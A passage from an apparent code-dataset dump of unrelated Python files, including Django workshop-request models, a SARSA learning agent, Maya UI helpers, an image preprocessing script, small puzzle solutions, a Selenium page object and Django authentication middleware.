\"\n \"Please visit the \"\n + SWC_LESSONS_LINK\n + \", \"\n + DC_LESSONS_LINK\n + \", or the \"\n + LC_LESSONS_LINK\n + \" for more information about any of our lessons. If you’re \"\n \"not sure and would like to discuss with us, please select \"\n 'the \"Don\\'t know yet\" option below.
'\n \"Check all that apply.\",\n )\n preferred_dates = models.DateField(\n blank=True,\n null=True,\n verbose_name=\"Preferred dates\",\n help_text=\"Our workshops typically run two full days. Please select \"\n \"your preferred first day for the workshop. If you do not \"\n \"have exact dates or are interested in an alternative \"\n \"schedule, please indicate so below. Because we need to \"\n \"coordinate with instructors, a minimum of 2-3 months lead \"\n \"time is required for workshop planning.\",\n )\n other_preferred_dates = models.CharField(\n max_length=200,\n blank=True,\n null=False,\n default=\"\",\n verbose_name=\"If your dates are not set, please provide more \"\n \"information below\",\n )\n language = models.ForeignKey(\n Language,\n on_delete=models.PROTECT,\n blank=True,\n null=True,\n verbose_name=\"What is the preferred language of communication for the \"\n \"workshop?\",\n help_text=\"Our workshops are offered primarily in English, with a few \"\n \"of our lessons available in Spanish. While materials are \"\n \"mainly in English, we know it can be valuable to have an \"\n \"instructor who speaks the native language of the learners. \"\n \"We will attempt to locate Instructors speaking a particular\"\n \" language, but cannot guarantee the availability of \"\n \"non-English speaking Instructors.\",\n )\n ATTENDEES_NUMBER_CHOICES = (\n UNSURE_CHOICE,\n (\"10-40\", \"10-40 (one room, two instructors)\"),\n (\"40-80\", \"40-80 (two rooms, four instructors)\"),\n (\"80-120\", \"80-120 (three rooms, six instructors)\"),\n )\n number_attendees = models.CharField(\n max_length=15,\n choices=ATTENDEES_NUMBER_CHOICES,\n blank=True,\n null=True,\n default=None,\n verbose_name=\"Anticipated number of attendees\",\n help_text=\"These recommendations are for in-person workshops. \"\n \"This number doesn't need to be precise, but will help us \"\n \"decide how many instructors your workshop will need. \"\n \"Each workshop must have at least two instructors.
\"\n \"For online Carpentries workshops, we recommend a maximum of \"\n \"20 learners per class. If your workshop attendance will \"\n \"exceed 20 learners please be sure to include a note in the \"\n \"comments section below. \"\n ,\n )\n FEE_CHOICES = (\n UNSURE_CHOICE,\n (\n \"nonprofit\",\n \"I am with a government site, university, or other \"\n \"nonprofit. I understand the workshop fee of US$2500, \"\n \"and agree to follow through on The Carpentries \"\n \"invoicing process.\",\n ),\n (\n \"forprofit\",\n \"I am with a corporate or for-profit site. I understand \"\n \"The Carpentries staff will contact me about workshop \"\n \"fees. I will follow through on The Carpentries \"\n \"invoicing process for the agreed upon fee.\",\n ),\n (\n \"member\",\n \"I am with a Member Organisation so the workshop fee does \"\n \"not apply (Instructor travel costs will still apply).\",\n ),\n (\n \"waiver\",\n \"I am requesting a scholarship for the workshop fee \"\n \"(Instructor travel costs will still apply).\",\n ),\n )\n administrative_fee = models.CharField(\n max_length=20,\n choices=FEE_CHOICES,\n blank=True,\n null=True,\n default=None,\n verbose_name=\"Which of the following applies to your payment for the \"\n \"administrative fee?\",\n )\n TRAVEL_EXPENCES_MANAGEMENT_CHOICES = (\n UNSURE_CHOICE,\n (\n \"booked\",\n \"Hotel and airfare will be booked by site; ground travel \"\n \"and meals/incidentals will be reimbursed within 60 days.\",\n ),\n (\n \"reimbursed\",\n \"All expenses will be booked by instructors and \"\n \"reimbursed within 60 days.\",\n ),\n (\"other\", \"Other:\"),\n )\n travel_expences_management = models.CharField(\n max_length=20,\n null=False,\n blank=True,\n default=\"\",\n choices=TRAVEL_EXPENCES_MANAGEMENT_CHOICES,\n verbose_name=\"How will you manage travel expenses for Carpentries \"\n \"Instructors?\",\n )\n travel_expences_management_other = models.CharField(\n max_length=STR_LONGEST,\n null=False,\n blank=True,\n default=\"\",\n verbose_name=\"Other travel expences management\",\n )\n travel_expences_agreement = models.BooleanField(\n null=False,\n blank=False,\n default=False,\n verbose_name=\"Regardless of the fee due to The Carpentries, I \"\n \"understand I am also responsible for travel costs for \"\n \"the Instructors which can include airfare, ground \"\n \"travel, hotel, and meals/incidentals. I understand \"\n \"local Instructors will be prioritized but not \"\n \"guaranteed. Instructor travel costs are managed \"\n \"directly between the host site and the Instructors, not \"\n \"through The Carpentries. I will share detailed \"\n \"information regarding policies and procedures for \"\n \"travel arrangements with instructors. All \"\n \"reimbursements will be completed within 60 days of \"\n \"the workshop.\",\n )\n RESTRICTION_CHOICES = (\n UNSURE_CHOICE,\n (\"no_restrictions\", \"No restrictions.\"),\n (\"other\", \"Other:\"),\n )\n institution_restrictions = models.CharField(\n max_length=20,\n null=False,\n blank=True,\n default=\"\",\n choices=RESTRICTION_CHOICES,\n verbose_name=\"Our instructors live, teach, and travel globally. We \"\n \"understand that institutions may have citizenship, \"\n \"confindentiality agreements or other requirements for \"\n \"employees or volunteers who facilitate workshops. If \"\n \"your institution fits this description, please share \"\n \"your requirements or note that there are no \"\n \"restrictions.\",\n )\n institution_restrictions_other = models.CharField(\n max_length=STR_LONGEST,\n null=False,\n blank=True,\n default=\"\",\n verbose_name=\"Other (institution restrictions)\",\n )\n carpentries_info_source = models.ManyToManyField(\n InfoSource,\n blank=True,\n verbose_name=\"How did you hear about The Carpentries?\",\n help_text=\"Check all that apply.\",\n )\n carpentries_info_source_other = models.CharField(\n max_length=STR_LONGEST,\n null=False,\n blank=True,\n default=\"\",\n verbose_name=\"Other source for information about The Carpentries\",\n )\n user_notes = models.TextField(\n blank=True,\n verbose_name=\"Will this workshop be conducted in-person or online? \"\n \"Is there any other information you would like to share \"\n \"with us?\",\n help_text=\"Knowing if this workshop is on-line or in-person will \"\n \"help ensure we can best support you in coordinating the event.\",\n )\n\n # override field `public_event` from CommonRequest mixin\n public_event = models.CharField(\n max_length=CommonRequest._meta.get_field(\"public_event\").max_length,\n null=False,\n blank=True,\n default=\"\",\n choices=(UNSURE_CHOICE,)\n + CommonRequest._meta.get_field(\"public_event\").choices,\n verbose_name=CommonRequest._meta.get_field(\"public_event\").verbose_name,\n help_text=CommonRequest._meta.get_field(\"public_event\").help_text,\n )\n\n class Meta:\n ordering = [\"created_at\"]\n\n def __str__(self):\n return (\n \"Workshop inquiry ({institution}, {personal} {family}) - {state}\"\n ).format(\n institution=str(self.institution or self.institution_other_name),\n personal=self.personal,\n family=self.family,\n state=self.get_state_display(),\n )\n\n def dates(self):\n if self.preferred_dates:\n return \"{:%Y-%m-%d}\".format(self.preferred_dates)\n else:\n return self.other_preferred_dates\n\n def preferred_dates_too_soon(self):\n # set cutoff date at 2 months\n cutoff = datetime.timedelta(days=2 * 30)\n if self.preferred_dates:\n return (self.preferred_dates - self.created_at.date()) < cutoff\n return False\n\n def get_absolute_url(self):\n return reverse(\"workshopinquiry_details\", args=[self.id])\n\n\nclass SelfOrganisedSubmission(\n AssignmentMixin,\n StateMixin,\n CreatedUpdatedMixin,\n CommonRequest,\n DataPrivacyAgreementMixin,\n COCAgreementMixin,\n HostResponsibilitiesMixin,\n EventLinkMixin,\n models.Model,\n):\n \"\"\"\n This model is used for storing user-submitted self-organised workshop\n information. It's very similar to Workshop Submission combined with\n DC Self-Organized Workshop Request.\n \"\"\"\n\n start = models.DateField(\n null=True,\n verbose_name=\"Workshop start date\",\n help_text=\"Please provide the dates that your Self-Organised workshop will\"\n \" run.\",\n )\n end = models.DateField(\n null=True,\n verbose_name=\"Workshop end date\"\n )\n workshop_url = models.URLField(\n max_length=STR_LONGEST,\n blank=True,\n null=False,\n default=\"\",\n verbose_name=\"Please share your workshop URL\",\n help_text=\"Use the link to the website, not the repository. This is \"\n \"typically in the format https://username.github.io/\"\n \"YYYY-MM-DD-sitename. If you are running an online workshop, \"\n \"please use the format YYYY-MM-DD-sitename-online.\",\n )\n FORMAT_CHOICES = (\n (\"standard\", \"Standard two-day Carpentries workshop\"),\n (\"short\", \"Short session (less than two days)\"),\n (\n \"periodic\",\n \"Modules taught over a period of time (several weeks, \"\n \"one semester, etc.)\",\n ),\n (\"other\", \"Other:\"),\n )\n workshop_format = models.CharField(\n max_length=20,\n null=False,\n blank=False,\n default=\"\",\n choices=FORMAT_CHOICES,\n verbose_name=\"What is the format of this workshop?\",\n )\n workshop_format_other = models.CharField(\n max_length=STR_LONGEST,\n null=False,\n blank=True,\n default=\"\",\n verbose_name=\"Other workshop format\",\n )\n workshop_types = models.ManyToManyField(\n Curriculum,\n limit_choices_to={\"active\": True},\n blank=False,\n verbose_name=\"Which Carpentries workshop are you teaching?\",\n )\n workshop_types_other = models.CharField(\n max_length=STR_LONGEST,\n null=False,\n blank=True,\n default=\"\",\n verbose_name=\"Other workshop types\",\n )\n workshop_types_other_explain = models.TextField(\n blank=True,\n verbose_name='If you selected \"Mix & Match\", please provide more'\n \" information here\",\n help_text=\"For example \\\"We are teaching Software Carpentry's Git \"\n 'lesson only\" or \"We are teaching Data Carpentry\\'s Ecology '\n 'workshop, but not teaching a programming language.\"',\n )\n country = CountryField(null=True, blank=False, verbose_name=\"Country\",)\n language = models.ForeignKey(\n Language,\n on_delete=models.PROTECT,\n blank=False,\n null=False,\n verbose_name=\"What language is this workshop being conducted in?\",\n )\n\n class Meta:\n verbose_name = \"Self-Organised Submission\"\n verbose_name_plural = \"Self-Organised Submissions\"\n ordering = [\"created_at\"]\n\n def __str__(self):\n return (\n \"Self-Organised Submission ({institution}, {personal} {family}) - {state}\"\n ).format(\n institution=str(self.institution or self.institution_other_name),\n personal=self.personal,\n family=self.family,\n state=self.get_state_display(),\n )\n\n def get_absolute_url(self):\n return reverse(\"selforganisedsubmission_details\", args=[self.id])\n","sub_path":"amy/extrequests/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":34975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"113302981","text":"# -*- coding: utf-8 -*-\n\"\"\"Forms.\"\"\"\n\nfrom django import forms\n\nSUBJECTS = (\n ('1','Others'),\n ('2','Report a bug'),\n ('3','Suggest'),\n)\n\nclass ContactForm(forms.Form):\n \"\"\"Contact form class.\"\"\"\n subject = forms.ChoiceField(choices = SUBJECTS,\n required = True, widget=forms.Select(attrs = {'size':'1'}))\n msg = forms.CharField(widget = forms.Textarea,\n label = u'Text', required=True)\n #sender = forms.EmailField(label=u'E-mail',\n # required=True, widget=forms.TextInput(attrs={'size':'40'}))\n #copy = forms.BooleanField(required=False, label=u'Send me a copy')","sub_path":"equipy_main/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"321077121","text":"import numpy as np\nimport pickle\nimport random\nfrom collections import defaultdict\nfrom env import Env\n\nMAX_EPISODE = 1000\n\nclass SARSAgent:\n def __init__(self, actions):\n self.actions = actions\n self.learning_rate = 0.01\n self.discount_factor = 0.9\n self.epsilon = 0.1 # 3) 시간이 지날수록 e 값이 감소하도록 코드를 수정하세요.\n self.q_table = defaultdict(lambda: [0.0, 0.0, 0.0, 0.0])\n\n # 큐함수 업데이트\n def learn(self, s, a, r, s_, a_):\n self.q_table[s][a] += self.learning_rate * (r + self.discount_factor * self.q_table[s_][a_] - self.q_table[s][a])\n\n # 입실론 탐욕 정책에 따라서 행동을 반환\n def get_action(self, state):\n if np.random.rand() < self.epsilon:\n # 무작위 행동 선택 (exploration)\n best_action = np.random.choice(self.actions)\n else:\n # 큐함수에 따른 최적 행동 반환 (exploitation)\n state_action = self.q_table[state]\n best_action = self.arg_max(state_action)\n\n return best_action\n\n \"\"\"\n @staticmethod\n def arg_max(state_action):\n max_index_list = []\n max_value = state_action[0]\n for index, value in enumerate(state_action):\n if value > max_value:\n max_index_list.clear()\n max_value = value\n max_index_list.append(index)\n elif value == max_value:\n max_index_list.append(index)\n return random.choice(max_index_list)\n \"\"\"\n\n @staticmethod\n def arg_max(state_action):\n max_index_list = []\n max_value = -9999\n\n for index, value in enumerate(state_action):\n if value > max_value:\n max_index_list.clear()\n max_value = value\n max_index_list.append(index)\n elif value == max_value:\n max_index_list.append(index)\n\n return random.choice(max_index_list)\n\n\nif __name__ == \"__main__\":\n env = Env() # 환경에 대한 instance 생성\n agent = SARSAgent(actions=list(range(env.n_actions))) # Sarsa Agent 객체 생성\n\n success_total_step = 0\n fail_total_step = 0\n num_success = 0\n num_fail = 0\n step_log = []\n\n # 지정된 횟수(MAX_EPISODE)만큼 episode 진행\n for episode in range(MAX_EPISODE):\n # 게임 환경과 상태를 초기화 하고, 상태(state)값 얻기\n num_step = 0\n\n state = env.reset()\n\n # 현재 상태에서 어떤 행동을 할지 선택\n action = agent.get_action(str(state))\n\n # 한개의 episode를 처음부터 끝까지 처리하는 while-loop\n while True:\n env.render()\n\n num_step += 1\n\n next_state, reward, done = env.step(action)\n next_action = agent.get_action(str(next_state))\n\n agent.learn(str(state), action, reward, str(next_state), next_action)\n\n state = next_state\n action = next_action\n # action = agent.get_action(str(next_state))\n\n # 모든 큐함수 값을 화면에 표시\n env.print_value_all(agent.q_table)\n\n # episode가 끝났으면 while-loop을 종료\n if done:\n if reward > 0:\n num_success += 1\n print(\"success\")\n success_total_step += num_step\n\n else:\n num_fail += 1\n print(\"fail\")\n fail_total_step += num_step\n\n step_log.append(num_step)\n break\n\n with open('pkl/log.pkl', 'wb') as f:\n pickle.dump([step_log,\n num_success,\n num_fail,\n success_total_step,\n fail_total_step], f)","sub_path":"4_sarsa/sarsa_agent_origin.py","file_name":"sarsa_agent_origin.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"551822936","text":"\nfrom .config import *\n\ndef switch_workspace(name):\n src = \"workspaceLayoutManager -sc \\\"%s\\\"\" % name\n eval_mel(src)\n switch_keyMap('kumaKeyMap')\n\ndef workspace_names():\n return eval_mel('workspaceLayoutManager -listLayouts')\n\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\n\ndef sync_to_attributeEditor(node_name):\n eval_mel('updateAE \\\"%s\\\"' % node_name)\ndef refresh_attributeEditor():\n eval_mel('refreshAE')\n\ndef window_options(title=None, titleBar=False, cx=None, cy=None, width=None, height=None, background=None):\n return \"-resizeToFitChildren false \" + flag_nullable('title', title) + flag_nullable('iconName', title) + '-titleBar %s ' % lowerBool(titleBar) + flag_nullable('topEdge', cx) + flag_nullable('leftEdge', cy) + flag_nullable('backgroundColor', background and expand_tuple(background)) + flag_nullable(\"width\", width) + flag_nullable('height', height)\n\ndef open(tool):\n abbr = {\n 'ae' : 'Attribute Editor',\n 'se' : 'Script Editor',\n 'xe' : 'XGen Editor',\n 'ue' : 'UV Editor',\n 'ts' : \"Tool Settings\",\n 'pe' : 'Paint Effects',\n 'hs' : 'Hypershade',\n 'tb' : 'Tool Box',\n 'ol' : 'Outliner',\n 'ne' : 'Node Editor',\n 'tm' : 'Time Slider',\n 'le' : 'Layer Editor',\n 'ae2': 'Asset Editor',\n 'he' : 'HotKey Editor',\n }\n action = {\n 'Attribute Editor': 'openAEWindow',\n \"Script Editor\" : \"ScriptEditor\",\n 'UV Editor' : 'TextureViewWindow',\n 'XGen Editor' : 'XgCreateDescriptionEditor',\n \"Tool Settings\" : 'ToolSettingsWindow',\n 'Paint Effects' : 'PaintEffectsWindow',\n 'Hypershade' : 'HypershadeWindow',\n 'Tool Box' : 'ToggleToolbox',\n 'Outliner' : 'OutlinerWindow',\n 'Node Editor' : 'NodeEditorWindow',\n 'Time Slider' : 'ToggleTimeSlider',\n 'Layer Editor' : 'DisplayLayerEditorWindow',\n 'Asset Editor' : 'AssetEditor',\n }\n if tool == 'cb' or tool == 'Channel Box':\n open_channelBox()\n else:\n t = abbr[tool] if tool in abbr else tool\n eval_mel(action[t])\n\ndef open_channelBox():\n eval_mel(\"\"\"\n window %s;\n formLayout form;\n channelBox dave;\n formLayout -e\n -af dave \"top\" 0\n -af dave \"left\" 0\n -af dave \"right\" 0\n -af dave \"bottom\" 0\n form;\n showWindow;\n \"\"\" % window_options(cx=0, cy=0, width=200, height=400))\n\ndef open_contentBrowser():\n eval_mel(\"\"\"\n ContentBrowserWindow;\n string $panelNames[] = `getPanel -scriptType \"contentBrowserPanel\"`;\n string $panelName = $panelNames[0];\n string $panelCompleteName = ($panelName + \"ContentBrowser\");\n contentBrowser -e $panelCompleteName;\n \"\"\")\n\n\n# return the path(s) selected\ndef file_dialog_options():\n return '-dialogStyle 2 -okCaption \\\"Accept\\\" -cancelCaption \\\"Cancel\\\" ' + '-startingDirectory \\\"%s\\\"' % maya_working_directory\ndef ask_for_one_directory(title=\"Ask for one directory\"):\n return eval_mel('fileDialog2 -fileMode 2 -caption \\\"%s\\\"' % title + file_dialog_options())\ndef ask_for_one_file(title=\"Ask for one file\"):\n return eval_mel('fileDialog2 -fileMode 1 -caption \\\"%s\\\"' % title + file_dialog_options())\ndef ask_for_some_files(title=\"As for some files\"):\n return eval_mel('fileDialog2 -fileMode 4 -caption \\\"%s\\\"' % title + file_dialog_options())\n","sub_path":"coldcode/python/master/script/kumaya/panel.py","file_name":"panel.py","file_ext":"py","file_size_in_byte":3559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"386258286","text":"from selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import *\nimport traceback\n\n\nclass BasePage(object):\n locators_dictionary = {\n \"ru.investing.com\": \"https://ru.investing.com/\"}\n\n def __init__(self, context, base_url='http://www.seleniumframework.com'):\n self.base_url = base_url\n self.browser = context.browser\n self.timeout = 10\n\n def find_element(self, *loc):\n print(*loc)\n return self.browser.find_element(*loc)\n\n def find_elements(self, *loc):\n return self.browser.find_elements(*loc)\n\n def visit(self, text):\n self.browser.get(self.locators_dictionary[text])\n\n def __getattr__(self, what):\n try:\n if what in self.locator_dictionary.keys():\n try:\n _element = WebDriverWait(self.browser, self.timeout).until(\n EC.presence_of_element_located(self.locator_dictionary[what])\n )\n except(TimeoutException, StaleElementReferenceException):\n traceback.print_exc()\n try:\n _element = WebDriverWait(self.browser, self.timeout).until(\n EC.visibility_of_element_located(self.locator_dictionary[what])\n )\n except(TimeoutException, StaleElementReferenceException):\n traceback.print_exc()\n return self.find_element(*self.locator_dictionary[what])\n except AttributeError:\n super(BasePage, self).__getattribute__(\"method_missing\")(what)\n\n def method_missing(self, what):\n print(\"No %s here!\" % what)\n","sub_path":"lib/pages/base_page.py","file_name":"base_page.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"292574938","text":"import collections\nclass Solution(object):\n def frequencySort(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n ans = \"\"\n st = collections.Counter(s)\n keys = sorted(st, key=st.get, reverse=True)\n for k in keys:\n k = k*st[k]\n ans=ans+k\n return ans\n \n \n","sub_path":"Sort Characters By Frequency.py","file_name":"Sort Characters By Frequency.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"592964162","text":"'''\r\n*CDKB 20180607\r\nPython script as part of ML hotdog/nothotdog test\r\n\r\n*TODO\r\n output 1xn row of features\r\n\tThen loop over directory and do this for all images to output a .txt file of features\r\n'''\r\n\r\n### Modules / Packages ###\r\nimport glob, os\r\nimport sys\r\nfrom PIL import Image\r\nimport numpy as np\r\nimport scipy.io\r\n#sys.path.append('../')\r\n#import pickle\r\n\r\n\r\n### source images stored in image directory\r\n## Import initial image\r\n'''\r\nimg = Image.open(\"IMG_DIR/HOTDOG/1.jpg\")\r\nimg.show()\r\nimg = img.convert(\"L\") ## mode L, black and white mode\r\nprint(\"Box: \",img.getbbox())\r\npix = list(img.getdata())\r\nprint(pix) ## list of all pixel values grayscale\r\nprint(\"Length: \",len(pix))\r\n## need one normalized wxh size\r\nimg = img.resize((400,200))\r\nprint(len(list(img.getdata())))\r\nimg.show()\r\n'''\r\n\r\n\r\n\r\ndef main():\r\n '''\r\n ## converts color images into 1 by ~10000 lists of greyscale pixels\r\n '''\r\n h = 100\r\n w = 150\r\n features = h*w\r\n size = (w,h)\r\n\r\n pos_path = \"IMG_DIR/HOTDOG/\"\r\n neg_path = \"IMG_DIR/NOTHOTDOG/\"\r\n path = [] ## empty list\r\n path.append(pos_path)\r\n path.append(neg_path)\r\n\r\n '''Image counts\r\n Useful for splitting into train/test/cv sets\r\n and for array creation'''\r\n m = 0\r\n for i in path:\r\n for infile in glob.glob(i + \"*.jpg\"):\r\n m += 1\r\n\r\n ## initialize arrays. 1 big array and 3 subarrays\r\n ary = {}\r\n ary[0] = np.array(np.zeros((1,features+1)))\r\n ary[1] = np.array(np.zeros((1,features+1)))\r\n ary[2] = np.array(np.zeros((1,features+1)))\r\n ary[3] = np.array(np.zeros((1,features+1)))\r\n #print(imgary.dtype)\r\n #print(\"Features: \",features)\r\n #print(\"Elements in Array: \",imgary.size)\r\n #print(\"Shape of Array (r x c): \",imgary.shape)\r\n #imgary[0,10000] = 7 ## assigning elements\r\n ## print(imgary[0,10000]) ## last element, since numpy lists 0-indexed\r\n #np.ones((1,features+1)\r\n\r\n '''Process Images'''\r\n cnt = [0,0]\r\n for i in path:\r\n if i == pos_path: y = 1\r\n if i == neg_path: y = 0\r\n for infile in glob.glob(i + \"*.jpg\"):\r\n file, ext = os.path.splitext(infile)## file is name, ext is the .jpg\r\n img = Image.open(file+ext)\r\n img = img.convert(\"L\")\r\n #img = img.convert(\"I\")\r\n #print(list(img.getdata()))\r\n #w,h = img.size #img = img.rotate(90)\r\n img = img.resize(size) ## convert to standard size\r\n #img.show()\r\n n = list(img.getdata())\r\n n.append(y)\r\n ## generate randomish 60/20/20 spread of examples\r\n ## when assigning each example m to dataset\r\n ## 1=train, 2=cross-valid, 3=test\r\n ary[0] = np.vstack((ary[0],n))\r\n #choice = np.random.choice([3,2,1],1,1,[.2,.2,.6])[0]\r\n #ary[choice] = np.vstack((ary[choice],n))\r\n\r\n #print(ary[choice])\r\n #print(ary[1].flatten())\r\n #print(ary[choice].shape)\r\n if y==1: cnt[1] +=1\r\n if y==0: cnt[0] +=1\r\n print(cnt)\r\n\r\n\r\n print(\"Positive Images: \",cnt[1])\r\n print(\"Negative Images: \",cnt[0])\r\n total = cnt[1] + cnt[0]\r\n print(\"Total images processed: \",total)\r\n\r\n ## delete the first row, was placeholder of 0s to construct array\r\n ary[0] = np.delete(ary[0],0,0)\r\n ary[0] = np.random.permutation(ary[0])\r\n valid_pos = 0\r\n valid_neg = 0\r\n test_pos = 0\r\n test_neg = 0\r\n pos_slice = int(cnt[1]/5)\r\n neg_slice = int(cnt[0]/5)\r\n\r\n ## assign each row to train/valid/test sets\r\n\r\n for i in range(0,total):\r\n n = ary[0][i]\r\n ## this m is y==1\r\n if n[features] == 1:\r\n if valid_pos <= pos_slice:\r\n ary[2] = np.vstack((ary[2],n))\r\n valid_pos = valid_pos+1\r\n elif test_pos <= pos_slice:\r\n ary[3] = np.vstack((ary[3],n))\r\n test_pos = test_pos+1\r\n else: ary[1] = np.vstack((ary[1],n))\r\n ## this m is y==0\r\n elif n[features] == 0:\r\n if valid_neg <= neg_slice:\r\n ary[2] = np.vstack((ary[2],n))\r\n valid_neg = valid_neg+1\r\n elif test_neg <= neg_slice:\r\n ary[3] = np.vstack((ary[3],n))\r\n test_neg = test_neg+1\r\n else: ary[1] = np.vstack((ary[1],n))\r\n\r\n for i in (1,2,3):\r\n ary[i] = np.delete(ary[i],0,0)\r\n ary[i] = np.random.permutation(ary[i])\r\n\r\n print(\"Training dataset: \",ary[1].shape)\r\n print(\"Validation dataset: \",ary[2].shape)\r\n print(\"Testing dataset: \",ary[3].shape)\r\n\r\n scipy.io.savemat('data_train.mat', mdict={'data_train': ary[1]})\r\n scipy.io.savemat('data_valid.mat', mdict={'data_valid': ary[2]})\r\n scipy.io.savemat('data_test.mat', mdict={'data_test': ary[3]})\r\n\r\n\r\nif (__name__==\"__main__\"):\r\n main()\r\n","sub_path":"process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":4859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"643892510","text":"n = int(input())\n\nmax_10 = n // 10\n\nans = 0\n\nfor i_10 in range(max_10 + 1):\n after_10 = n - i_10 * 10\n ans += after_10 // 5 + 1\n\nprint(ans)\n","sub_path":"1st-term/Python/contests/contest_1/change_of_coins.py","file_name":"change_of_coins.py","file_ext":"py","file_size_in_byte":146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"239782853","text":"with open('./input01.txt', 'r') as f:\n a = sorted(map(int, list(f)))\n\nprint('Good')\nfor i in range(len(a) - 2):\n\tif a[i] >= 2020:\n\t\tbreak\n\telse:\n\t\tfor j in range(i + 1, len(a) - 1):\n\t\t\tsum2 = a[i] + a[j]\n\t\t\tif sum2 > 2020:\n\t\t\t\tbreak\n\t\t\telif sum2 == 2020:\n\t\t\t\tprint('2:', a[i] * a[j])\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tfor k in range(j + 1, len(a)):\n\t\t\t\t\tsum3 = sum2 + a[k]\n\t\t\t\t\tif sum3 > 2020:\n\t\t\t\t\t\tbreak\n\t\t\t\t\telif sum3 == 2020:\n\t\t\t\t\t\tprint('3:', a[i] * a[j] * a[k])\n\t\t\t\t\t\tbreak\n\nprint('\\nBad, but correct')\nfor i in a:\n\tfor j in a:\n\t\tif (i + j == 2020):\n\t\t\tprint('2:', i * j)\n\t\tfor k in a:\n\t\t\tif (i + j + k == 2020):\n\t\t\t\tprint('3:', i * j * k)\n\nprint('\\nBaaaaaaaad, but correct')\nfrom random import sample\nfrom functools import reduce\n\nfor i in range(2, 4):\n\tsub = []\n\tn = 0\n\twhile n != 2020:\n\t\tsub = sample(a, i)\n\t\tn = sum(sub)\n\tprint(i, reduce((lambda x, y: x * y), sub))\n","sub_path":"day01.py","file_name":"day01.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"418957710","text":"class Solution:\n def removeDuplicates(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n size = len(nums)\n # 只要有重复的元素覆盖就可以了\n if size == 0:\n return 0\n # 接下来要赋值的那个元素\n next = 0\n for index in range(1, size):\n if nums[index] != nums[next]:\n next += 1\n nums[next] = nums[index]\n # 当前在最后一个位置上,+ 1 才是新数组的长度\n return next + 1\n","sub_path":"03-数组问题/0026-删除排序数组中的重复项.py","file_name":"0026-删除排序数组中的重复项.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"40493969","text":"__author__ = 'brutu'\n\nfrom django.conf import settings\nfrom django.http import HttpResponseRedirect\nfrom django.http import HttpResponse\nfrom customuser.models import CustomUser\nfrom course.models import *\nfrom django.utils import timezone\n\nimport re\n\nclass RequireLoginMiddleware(object):\n def __init__(self):\n self.exceptions = tuple([re.compile(url) for url in settings.LOGIN_REQUIRED_URLS_EXCEPTIONS])\n self.require_login_path = getattr(settings, 'LOGIN_URL', '/login/$')\n\n def process_request(self, request):\n if request.user.is_authenticated():\n user = CustomUser.objects.get(pk=request.user.id)\n user.last_activity = timezone.now()\n user.save()\n return None\n\n for url in self.exceptions:\n if url.match(request.path):\n return None\n\n if request.user.is_anonymous():\n return HttpResponseRedirect('%s?next=%s' % (self.require_login_path, request.path))\n\nclass CoursePermissionMiddleware(object):\n def __init__(self):\n self.exceptions = tuple([re.compile(url) for url in settings.COURSE_PERMISSION_URLS_EXCEPTIONS])\n self.home_path = getattr(settings, 'HOME_URL', '/')\n\n def process_view(self, request, view_func, view_args, view_kwargs):\n\n for url in self.exceptions:\n if url.match(request.path): return None\n\n customuser = CustomUser.objects.get(pk=request.user.id)\n course = Course.objects.get(short_title=view_kwargs['course_short_title'])\n\n try:\n courseuserrelation = CourseUserRelation.objects.get(user=customuser,course=course)\n courses = []\n for relation in CourseUserRelation.objects.filter(user=customuser):\n courses.append(relation.course)\n request.session['courses'] = courses\n request.session['course_short_title'] = course.short_title\n return None\n except:\n return HttpResponse('You do not have the permission to view anything related to this course!')","sub_path":"custommiddleware/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"505941728","text":"\"\"\"\ncommon_cv.py\n\nDefine collective variable superclasses (also known as milestone \nshapes) that might be used in SEEKR2 calculations.\n\"\"\"\n\nfrom abserdes import Serializer\n\nclass Spherical_cv_anchor(Serializer):\n \"\"\"\n This object represents an anchor within the concentric spherical\n CV. Used for input purposes only.\n \n Attributes:\n -----------\n radius : float\n The radius of this spherical anchor in units of nanometers.\n \n lower_milestone_radius : float\n Optionally define the locations of the milestones for each\n anchor. This is the radius of the lower milestone.\n \n upper_milestone_radius : float\n Optionally define the locations of the milestones for each\n anchor. This is the radius of the lower milestone.\n \n starting_amber_params : Amber_params or None\n If Amber inputs are used for this anchor, this object contains\n the necessary inputs to start a new simulation.\n \n starting_forcefield_params : Forcefield_params or None\n If Forcefield XML inputs are used for this anchor, this object\n contains the necessary inputs to start a new simulation.\n \n bound_state : bool\n Whether this anchor represents the bound state of a ligand-\n receptor system.\n \n bulk_anchor : bool\n Whether this anchor acts as a bulk state of a ligand-receptor\n system.\n \"\"\"\n \n def __init__(self):\n self.radius = 0.0\n self.lower_milestone_radius = None\n self.upper_milestone_radius = None\n self.starting_amber_params = None\n self.starting_forcefield_params = None\n self.bound_state = False\n 